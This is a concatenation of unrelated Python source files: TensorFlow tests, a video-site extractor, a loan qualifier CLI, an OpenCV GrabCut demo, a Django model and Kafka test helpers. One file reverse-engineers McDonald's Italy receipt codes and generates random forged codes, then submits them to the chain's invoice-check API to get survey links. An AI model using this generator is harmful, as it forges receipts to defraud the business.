z = array_ops.ones(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
class OnesLikeTest(test.TestCase):
def testOnesLike(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
numpy_dtype = dtype.as_numpy_dtype
with self.test_session():
# Creates a tensor of non-zero values with shape 2 x 3.
d = constant_op.constant(
np.ones(
(2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.ones_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[1] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testOnesLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.ones_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
class FillTest(test.TestCase):
def _compare(self, dims, val, np_ans, use_gpu):
with self.test_session(use_gpu=use_gpu):
tf_ans = array_ops.fill(dims, val, name="fill")
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
# Fill does not set the shape.
# self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, dims, val, np_ans):
self._compare(dims, val, np_ans, False)
self._compare(dims, val, np_ans, True)
def testFillFloat(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillDouble(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt32(self):
np_ans = np.array([[42] * 3] * 2).astype(np.int32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt64(self):
np_ans = np.array([[-42] * 3] * 2).astype(np.int64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillComplex64(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex64)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillComplex128(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex128)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillString(self):
np_ans = np.array([[b"yolo"] * 3] * 2)
with self.test_session(use_gpu=False):
tf_ans = array_ops.fill([2, 3], np_ans[0][0], name="fill").eval()
self.assertAllEqual(np_ans, tf_ans)
def testFillNegative(self):
with self.test_session():
for shape in (-1,), (2, -1), (-1, 2), (-2), (-3):
with self.assertRaises(ValueError):
array_ops.fill(shape, 7)
# Using a placeholder so this won't be caught in static analysis.
dims = array_ops.placeholder(dtypes_lib.int32)
fill_t = array_ops.fill(dims, 3.0)
for shape in (-1,), (2, -1), (-1, 2), (-2), (-3):
with self.assertRaises(errors_impl.InvalidArgumentError):
fill_t.eval({dims: shape})
def testShapeFunctionEdgeCases(self):
# Non-vector dimensions.
with self.assertRaises(ValueError):
array_ops.fill([[0, 1], [2, 3]], 1.0)
# Non-scalar value.
with self.assertRaises(ValueError):
array_ops.fill([3, 2], [1.0, 2.0])
# Partial dimension information.
f = array_ops.fill(array_ops.placeholder(dtypes_lib.int32, shape=(4,)), 3.0)
self.assertEqual([None, None, None, None], f.get_shape().as_list())
f = array_ops.fill(
[array_ops.placeholder(
dtypes_lib.int32, shape=()), 17], 1.0)
self.assertEqual([None, 17], f.get_shape().as_list())
def testGradient(self):
with self.test_session():
in_v = constant_op.constant(5.0)
out_shape = [3, 2]
out_filled = array_ops.fill(out_shape, in_v)
err = gradient_checker.compute_gradient_error(in_v, [], out_filled,
out_shape)
self.assertLess(err, 1e-3)
class PlaceholderTest(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
self.assertEqual(10, d.eval(feed_dict={p: 2}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder(dtypes_lib.float32, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder(dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderV2Test(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testUnknownShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
# can feed anything
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
feed_array = np.random.rand(4, 2, 5)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
def testScalarShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=[], name="p")
p_identity = array_ops.identity(p)
self.assertAllClose(p_identity.eval(feed_dict={p: 5}), 5)
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_v2(
dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
val = np.array(2).astype(np.int)
self.assertEqual(10, d.eval(feed_dict={p: val}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder_v2(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder_v2(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder_v2(
dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderWithDefaultTest(test.TestCase):
def testFullShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([[2, 2], [2, 2]], shape=[2, 2])
a = array_ops.identity(p)
self.assertAllEqual([[2, 2], [2, 2]], a.eval())
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[6, 6, 6], [6, 6, 6]]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([1, 2, 3], shape=[None])
a = array_ops.identity(p)
self.assertAllEqual([1, 2, 3], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[2, 2], [2, 2]]})
def testNoShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([17], shape=None)
a = array_ops.identity(p)
self.assertAllEqual([17], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
if __name__ == "__main__":
test.main()
|
py | b40b4b826059c578b56a45c63e6c4079852e4fb5 | # -*- coding: utf-8 -*-
# Copyright 2019 Giacomo Ferretti
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import random
from datetime import datetime, timedelta
import requests
from ffapi import utils
_logger = logging.getLogger(__name__)
check_invoice = 'https://mcdonalds.fast-insight.com/voc/bs/api/v3/it/checkInvoice'
# Load locations
_locations_filename = 'locations.json'
if os.path.isfile(os.path.join(os.path.dirname(__file__), _locations_filename)):
_logger.debug('Loading "{}"...'.format(_locations_filename))
with open(os.path.join(os.path.dirname(__file__), _locations_filename)) as f:
locations = json.loads(f.read())
else:
_logger.debug('"{}" not found. Most promocodes won\'t be valid.'.format(_locations_filename))
def parse_date(d):
return d.strftime('%Y-%m-%d')
def days_diff(d1):
d1 = datetime.strptime(d1, "%Y-%m-%d")
d2 = datetime.strptime('2014-12-31', "%Y-%m-%d")
return abs((d2 - d1).days)
def days_to_date(d):
return datetime.strptime('2014-12-31', "%Y-%m-%d") + timedelta(days=int(d))
def flip(string):
    # Reverse the string; digits are stored in reversed order inside the code.
    return string[::-1]
def decimal_to_base28(src):
dictionary = 'ABCDEFGHIJKLMNOPRSTUWXZ45679'
return utils.decimal_to_base(dictionary, src)
def base28_to_decimal(src):
dictionary = 'ABCDEFGHIJKLMNOPRSTUWXZ45679'
return utils.base_to_decimal(dictionary, src)
def right(src, n):
if n <= 0:
return ''
elif n > len(src):
return src
else:
return src[(len(src) - n):len(src)]
def checksum(src):
total = 0
for i in range(len(src)):
total = total + ord(src[i]) * (3 ** (len(src) - i))
result = right('AAA' + decimal_to_base28(total), 3)
return result
def verify_checksum(src):
    c_checksum = get_checksum(src)
    c_no_checksum = get_code_without_checksum(src)
    # The embedded checksum must equal the checksum recomputed from the
    # stripped code (generate_promocode inserts checksum(gen4) into gen4).
    return c_checksum == checksum(c_no_checksum)
def insert_at(src, ins, ind):
return src[:ind] + ins + src[ind:]
def get_checksum(src):
return src[11:12] + src[7:8] + src[1:2]
def get_code_without_checksum(src):
return src[:1] + src[2:7] + src[8:11] + src[12:]
def decode_promocode(promocode):
gen = get_code_without_checksum(promocode)
gen2 = str(base28_to_decimal(gen))[1:]
gen3 = flip(gen2)
return {
'pos': gen3[4:6],
'site': gen3[:4],
'date': days_to_date(gen3[6:10]),
'num': gen3[10:]
}
def generate_promocode(pos, site, date, num_trans):
gen = '{:04}{:02}{:04}{:04}'.format(site, pos, days_diff(date), num_trans)
gen2 = flip(gen)
gen3 = '1' + gen2
gen4 = decimal_to_base28(gen3)
gen5 = checksum(gen4)
gen6 = gen4
gen6 = insert_at(gen6, gen5[0], 9)
gen6 = insert_at(gen6, gen5[1], 6)
gen6 = insert_at(gen6, gen5[2], 1)
return gen6
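# A round-trip sketch with hypothetical receipt values: decode_promocode()
# reverses each step of generate_promocode(), so encoding a receipt and
# decoding the result should recover the zero-padded fields.
#
#   code = generate_promocode(pos=3, site=123, date='2019-06-01', num_trans=42)
#   decode_promocode(code)
#   # -> {'pos': '03', 'site': '0123', 'date': <datetime for 2019-06-01>, 'num': '0042'}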
def generate_random_promocode():
if 'locations' in globals():
location = random.choice(locations)
else:
location = random.randint(1, 3240)
data = {
'pos': random.randint(0, 20),
'site': location,
'date': parse_date(datetime.now()),
'num_trans': random.randint(0, 9999)
}
return generate_promocode(data['pos'], data['site'], data['date'], data['num_trans'])
def generate_survey_link(promocode, proxies=None, verify=True):
data = {
'invoice': promocode,
'meta': {}
}
_logger.debug(decode_promocode(promocode))
x = requests.post(check_invoice, json=data, proxies=proxies, verify=verify)
_logger.debug('{}: {}'.format(x.status_code, x.content))
if x.status_code == 200:
y = json.loads(x.content.decode())
        return '{url}?lang=it&timestamp={timestamp}&mbunq={mbunq}'\
.format(url=y['data']['meta']['url'], timestamp=y['data']['meta']['timestamp'], mbunq=y['data']['data'])
else:
return None
|
py | b40b4c4afded1b6f9541d60b3b2d3fb5fe0c5973 | # coding: utf-8
from __future__ import unicode_literals
import json
import hashlib
import re
from .aws import AWSIE
from .anvato import AnvatoIE
from .common import InfoExtractor
from ..utils import (
smuggle_url,
urlencode_postdata,
xpath_text,
)
class ScrippsNetworksWatchIE(AWSIE):
IE_NAME = 'scrippsnetworks:watch'
_VALID_URL = r'''(?x)
https?://
watch\.
(?P<site>geniuskitchen)\.com/
(?:
player\.[A-Z0-9]+\.html\#|
show/(?:[^/]+/){2}|
player/
)
(?P<id>\d+)
'''
_TESTS = [{
'url': 'http://watch.geniuskitchen.com/player/3787617/Ample-Hills-Ice-Cream-Bike/',
'info_dict': {
'id': '4194875',
'ext': 'mp4',
'title': 'Ample Hills Ice Cream Bike',
'description': 'Courtney Rada churns up a signature GK Now ice cream with The Scoopmaster.',
'uploader': 'ANV',
'upload_date': '20171011',
'timestamp': 1507698000,
},
'params': {
'skip_download': True,
},
'add_ie': [AnvatoIE.ie_key()],
}]
_SNI_TABLE = {
'geniuskitchen': 'genius',
}
_AWS_API_KEY = 'E7wSQmq0qK6xPrF13WmzKiHo4BQ7tip4pQcSXVl1'
_AWS_PROXY_HOST = 'web.api.video.snidigital.com'
_AWS_USER_AGENT = 'aws-sdk-js/2.80.0 callback'
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
site_id, video_id = mobj.group('site', 'id')
aws_identity_id_json = json.dumps({
'IdentityId': '%s:7655847c-0ae7-4d9b-80d6-56c062927eb3' % self._AWS_REGION
}).encode('utf-8')
token = self._download_json(
'https://cognito-identity.%s.amazonaws.com/' % self._AWS_REGION, video_id,
data=aws_identity_id_json,
headers={
'Accept': '*/*',
'Content-Type': 'application/x-amz-json-1.1',
'Referer': url,
'X-Amz-Content-Sha256': hashlib.sha256(aws_identity_id_json).hexdigest(),
'X-Amz-Target': 'AWSCognitoIdentityService.GetOpenIdToken',
'X-Amz-User-Agent': self._AWS_USER_AGENT,
})['Token']
sts = self._download_xml(
'https://sts.amazonaws.com/', video_id, data=urlencode_postdata({
'Action': 'AssumeRoleWithWebIdentity',
'RoleArn': 'arn:aws:iam::710330595350:role/Cognito_WebAPIUnauth_Role',
'RoleSessionName': 'web-identity',
'Version': '2011-06-15',
'WebIdentityToken': token,
}), headers={
'Referer': url,
'X-Amz-User-Agent': self._AWS_USER_AGENT,
'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
})
def get(key):
return xpath_text(
sts, './/{https://sts.amazonaws.com/doc/2011-06-15/}%s' % key,
fatal=True)
mcp_id = self._aws_execute_api({
'uri': '/1/web/brands/%s/episodes/scrid/%s' % (self._SNI_TABLE[site_id], video_id),
'access_key': get('AccessKeyId'),
'secret_key': get('SecretAccessKey'),
'session_token': get('SessionToken'),
}, video_id)['results'][0]['mcpId']
return self.url_result(
smuggle_url(
'anvato:anvato_scripps_app_web_prod_0837996dbe373629133857ae9eb72e740424d80a:%s' % mcp_id,
{'geo_countries': ['US']}),
AnvatoIE.ie_key(), video_id=mcp_id)
class ScrippsNetworksIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?(?P<site>cookingchanneltv|discovery|(?:diy|food)network|hgtv|travelchannel)\.com/videos/[0-9a-z-]+-(?P<id>\d+)'
_TESTS = [{
'url': 'https://www.cookingchanneltv.com/videos/the-best-of-the-best-0260338',
'info_dict': {
'id': '0260338',
'ext': 'mp4',
'title': 'The Best of the Best',
'description': 'Catch a new episode of MasterChef Canada Tuedsay at 9/8c.',
'timestamp': 1475678834,
'upload_date': '20161005',
'uploader': 'SCNI-SCND',
},
'add_ie': ['ThePlatform'],
}, {
'url': 'https://www.diynetwork.com/videos/diy-barnwood-tablet-stand-0265790',
'only_matching': True,
}, {
'url': 'https://www.foodnetwork.com/videos/chocolate-strawberry-cake-roll-7524591',
'only_matching': True,
}, {
'url': 'https://www.hgtv.com/videos/cookie-decorating-101-0301929',
'only_matching': True,
}, {
'url': 'https://www.travelchannel.com/videos/two-climates-one-bag-5302184',
'only_matching': True,
}, {
'url': 'https://www.discovery.com/videos/guardians-of-the-glades-cooking-with-tom-cobb-5578368',
'only_matching': True,
}]
_ACCOUNT_MAP = {
'cookingchanneltv': 2433005105,
'discovery': 2706091867,
'diynetwork': 2433004575,
'foodnetwork': 2433005105,
'hgtv': 2433004575,
'travelchannel': 2433005739,
}
_TP_TEMPL = 'https://link.theplatform.com/s/ip77QC/media/guid/%d/%s?mbr=true'
def _real_extract(self, url):
site, guid = re.match(self._VALID_URL, url).groups()
return self.url_result(smuggle_url(
self._TP_TEMPL % (self._ACCOUNT_MAP[site], guid),
{'force_smil_url': True}), 'ThePlatform', guid)
|
py | b40b4c618652b1d95a5f8ccb16a73c615aa8ed5c | # -*- coding: utf-8 -*-
"""Loan Qualifier Application.
This is a command line application to match applicants with qualifying loans.
Example:
$ python app.py
"""
import sys
import csv
import fire
import questionary
from pathlib import Path
from qualifier.utils.fileio import load_csv
from qualifier.utils.calculators import (
calculate_monthly_debt_ratio,
calculate_loan_to_value_ratio,
)
from qualifier.filters.max_loan_size import filter_max_loan_size
from qualifier.filters.credit_score import filter_credit_score
from qualifier.filters.debt_to_income import filter_debt_to_income
from qualifier.filters.loan_to_value import filter_loan_to_value
def load_bank_data():
"""Ask for the file path to the latest banking data and load the CSV file.
Returns:
The bank data from the data rate sheet CSV file.
"""
csvpath = questionary.text("Enter a file path to a rate-sheet (.csv):").ask()
csvpath = Path(csvpath)
if not csvpath.exists():
sys.exit(f"Oops! Can't find this path: {csvpath}")
return load_csv(csvpath)
def get_applicant_info():
"""Prompt dialog to get the applicant's financial information.
Returns:
Returns the applicant's financial information.
"""
credit_score = questionary.text("What's your credit score?").ask()
debt = questionary.text("What's your current amount of monthly debt?").ask()
income = questionary.text("What's your total monthly income?").ask()
loan_amount = questionary.text("What's your desired loan amount?").ask()
home_value = questionary.text("What's your home value?").ask()
credit_score = int(credit_score)
debt = float(debt)
income = float(income)
loan_amount = float(loan_amount)
home_value = float(home_value)
return credit_score, debt, income, loan_amount, home_value
def find_qualifying_loans(bank_data, credit_score, debt, income, loan, home_value):
"""Determine which loans the user qualifies for.
Loan qualification criteria is based on:
- Credit Score
- Loan Size
- Debt to Income ratio (calculated)
- Loan to Value ratio (calculated)
Args:
bank_data (list): A list of bank data.
credit_score (int): The applicant's current credit score.
debt (float): The applicant's total monthly debt payments.
income (float): The applicant's total monthly income.
loan (float): The total loan amount applied for.
home_value (float): The estimated home value.
Returns:
A list of the banks willing to underwrite the loan.
"""
# Calculate the monthly debt ratio
monthly_debt_ratio = calculate_monthly_debt_ratio(debt, income)
print(f"The monthly debt to income ratio is {monthly_debt_ratio:.02f}")
# Calculate loan to value ratio
loan_to_value_ratio = calculate_loan_to_value_ratio(loan, home_value)
print(f"The loan to value ratio is {loan_to_value_ratio:.02f}.")
# Run qualification filters
bank_data_filtered = filter_max_loan_size(loan, bank_data)
bank_data_filtered = filter_credit_score(credit_score, bank_data_filtered)
bank_data_filtered = filter_debt_to_income(monthly_debt_ratio, bank_data_filtered)
bank_data_filtered = filter_loan_to_value(loan_to_value_ratio, bank_data_filtered)
print(f"Found {len(bank_data_filtered)} qualifying loans")
return bank_data_filtered
def save_qualifying_loans(qualifying_loans):
"""Accepts the list of qualifying loans and asks where to save it.
Args:
qualifying_loans (list of lists): The qualifying bank loans.
"""
# Questionary confirm tool to check if user wants to save list
if questionary.confirm("Would you like to save the list of qualifying loans?").ask():
# If user doesn't have any loans, exit with exit message
        if not qualifying_loans:
sys.exit("You have no loans to save, nice try")
# If user has more than one loan and wants to save list, ask for output file path
output_file_path = questionary.text("Enter the output file path (.csv): ").ask()
# If sure, write list into output file path variable saved above
if questionary.confirm("Are you sure?").ask():
with open(output_file_path, 'w', encoding='UTF8', newline='') as f:
writer = csv.writer(f)
writer.writerows(qualifying_loans)
# Print loans have been saved in specified file path
print(f"The list of qualifying loans has been saved in {output_file_path}")
def run():
"""The main function for running the script."""
# Load the latest Bank data
bank_data = load_bank_data()
# Get the applicant's information
credit_score, debt, income, loan_amount, home_value = get_applicant_info()
# Find qualifying loans
qualifying_loans = find_qualifying_loans(
bank_data, credit_score, debt, income, loan_amount, home_value
)
# Save qualifying loans
save_qualifying_loans(qualifying_loans)
if __name__ == "__main__":
fire.Fire(run)
|
py | b40b4cdb9cff9581dccf3a6e626750d98de0b5e3 |
import numpy as np
import cv2
import os
import sys
path = os.path.abspath(os.path.dirname(sys.argv[0]))
# Mouse event callback function
def on_mouse(event,x,y,flag,param):
global rect
global leftButtonDowm
global leftButtonUp
    # Left mouse button pressed
if event == cv2.EVENT_LBUTTONDOWN:
rect[0] = x
rect[2] = x
rect[1] = y
rect[3] = y
leftButtonDowm = True
leftButtonUp = False
    # Mouse move event
if event == cv2.EVENT_MOUSEMOVE:
if leftButtonDowm and not leftButtonUp:
rect[2] = x
rect[3] = y
    # Left mouse button released
if event == cv2.EVENT_LBUTTONUP:
if leftButtonDowm and not leftButtonUp:
x_min = min(rect[0],rect[2])
y_min = min(rect[1],rect[3])
x_max = max(rect[0],rect[2])
y_max = max(rect[1],rect[3])
rect[0] = x_min
rect[1] = y_min
rect[2] = x_max
rect[3] = y_max
leftButtonDowm = False
leftButtonUp = True
img = cv2.imread(path + '/imgs/low_quality1.jpg')
mask = np.zeros(img.shape[:2],np.uint8)
bgdModel = np.zeros((1,65),np.float64) # Background model
fgdModel = np.zeros((1,65),np.float64) # Foreground model
rect = [0,0,0,0] # Image region to segment
leftButtonDowm = False # Left mouse button pressed
leftButtonUp = True # Left mouse button released
cv2.namedWindow('img') # Create a window with the given name
cv2.setMouseCallback('img',on_mouse) # Register the mouse callback to capture mouse input
cv2.imshow('img',img) # Show the image
while cv2.waitKey(2) == -1:
    # Left button held: draw the selection rectangle
if leftButtonDowm and not leftButtonUp:
img_copy = img.copy()
cv2.rectangle(img_copy,(rect[0],rect[1]),(rect[2],rect[3]),(0,255,0),2)
cv2.imshow('img',img_copy)
    # Left button released: the rectangle is complete
elif not leftButtonDowm and leftButtonUp and rect[2] - rect[0] != 0 and rect[3] - rect[1] != 0:
rect[2] = rect[2]-rect[0]
rect[3] = rect[3]-rect[1]
rect_copy = tuple(rect.copy())
rect = [0,0,0,0]
        # Object segmentation
cv2.grabCut(img,mask,rect_copy,bgdModel,fgdModel,2,cv2.GC_INIT_WITH_RECT)
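        # cv2.grabCut labels pixels 0/2 as (probable) background and 1/3 as
        # (probable) foreground; the mask below keeps only foreground pixels.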
mask2 = np.where((mask==2)|(mask==0),0,1).astype('uint8')
img_show = img*mask2[:,:,np.newaxis]
        # Show the segmentation result and the original image
cv2.imshow('grabcut',img_show)
cv2.imshow('img',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
py | b40b4d2aa2a1a0241dc74f0ab50634d4466705d8 | #Django
from django.db import models
#Utilities
from AmbieNet.util.models.ambienet import AmbieNetModel
class Profile(AmbieNetModel):
"""
Profile.
Data from common user of application, (users of social network).
"""
user = models.OneToOneField('users.User', on_delete=models.CASCADE)
picture = models.CharField(max_length=255, blank=True, null=True)
biography = models.TextField(max_length=500, blank=True)
"""User's ubication"""
country = models.TextField(max_length=30)
state = models.TextField(max_length=30)
city = models.TextField(max_length=30)
"""User's ubication exactly"""
latitude = models.FloatField(default=0.0)
longitude = models.FloatField(default=0.0)
reputation = models.FloatField(
default=5.0,
help_text="User's reputation based on the rides taken and offered."
)
|
py | b40b4d39c3bccd3c24cc7a3be39506e9ad4cfed7 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kafkatest import __version__ as __kafkatest_version__
import re
def kafkatest_version():
"""Return string representation of current ducktape version."""
return __kafkatest_version__
def _kafka_jar_versions(proc_string):
"""Use a rough heuristic to find all kafka versions explicitly in the process classpath. We need to handle patterns
like:
- kafka_2.11-1.0.0-SNAPSHOT.jar
- kafka_2.11-0.11.0.0-SNAPSHOT.jar
- kafka-1.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly)
- kafka-0.11.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly)
- kafka-streams-1.0.0-SNAPSHOT.jar
- kafka-streams-0.11.0.0-SNAPSHOT.jar
"""
# Pattern example: kafka_2.11-1.0.0-SNAPSHOT.jar (we have to be careful not to partially match the 4 segment version string)
versions = re.findall("kafka_[0-9]+\.[0-9]+-([0-9]+\.[0-9]+\.[0-9]+)[\.-][a-zA-z]", proc_string)
# Pattern example: kafka_2.11-0.11.0.0-SNAPSHOT.jar
versions.extend(re.findall("kafka_[0-9]+\.[0-9]+-([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", proc_string))
# Pattern example: kafka-1.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly, we have to be careful not to
# partially match the 4 segment version)
versions.extend(re.findall("kafka-([0-9]+\.[0-9]+\.[0-9]+)/", proc_string))
# Pattern example: kafka-0.11.0.0/bin/../libs/* (i.e. the JARs are not listed explicitly)
versions.extend(re.findall("kafka-([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", proc_string))
# Pattern example: kafka-streams-1.0.0-SNAPSHOT.jar (we have to be careful not to partially match the 4 segment version string)
versions.extend(re.findall("kafka-[a-z]+-([0-9]+\.[0-9]+\.[0-9]+)[\.-][a-zA-z]", proc_string))
# Pattern example: kafka-streams-0.11.0.0-SNAPSHOT.jar
versions.extend(re.findall("kafka-[a-z]+-([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", proc_string))
return set(versions)
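# Illustrative example of the heuristic (made-up classpath): each version is
# reported once, whether it comes from an explicit JAR name or an expanded
# release directory.
#
#   _kafka_jar_versions("kafka_2.11-1.0.0-SNAPSHOT.jar:kafka-0.11.0.0/bin/../libs/*")
#   # -> {'1.0.0', '0.11.0.0'}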
def is_version(node, version_list, proc_grep_string="kafka", logger=None):
"""Heuristic to check that only the specified version appears in the classpath of the process
A useful tool to aid in checking that service version apis are working correctly.
"""
lines = [l for l in node.account.ssh_capture("ps ax | grep %s | grep -v grep" % proc_grep_string)]
assert len(lines) == 1
psLine = lines[0]
versions = _kafka_jar_versions(psLine)
r = versions == {str(v) for v in version_list}
if not r and logger is not None:
logger.warning("%s: %s version mismatch: expected %s, actual %s, ps line %s" % \
(str(node), proc_grep_string, version_list, versions, psLine))
return r
def is_int(msg):
"""Method used to check whether the given message is an integer
return int or raises an exception if message is not an integer
"""
try:
return int(msg)
except ValueError:
raise Exception("Unexpected message format (expected an integer). Message: %s" % (msg))
def is_int_with_prefix(msg):
"""
    Method used to check whether the given message is of format 'integer_prefix'.'integer_value'
    :param msg: message to validate
    :return: msg or raises an exception if the message is of the wrong format
"""
try:
parts = msg.split(".")
if len(parts) != 2:
raise Exception("Unexpected message format. Message should be of format: integer "
"prefix dot integer value. Message: %s" % (msg))
int(parts[0])
int(parts[1])
return msg
except ValueError:
raise Exception("Unexpected message format. Message should be of format: integer "
"prefix dot integer value, but one of the two parts (before or after dot) "
"are not integers. Message: %s" % (msg))
def node_is_reachable(src_node, dst_node):
"""
    Returns True if a node is reachable from another node.
    :param src_node: The source node to check reachability from.
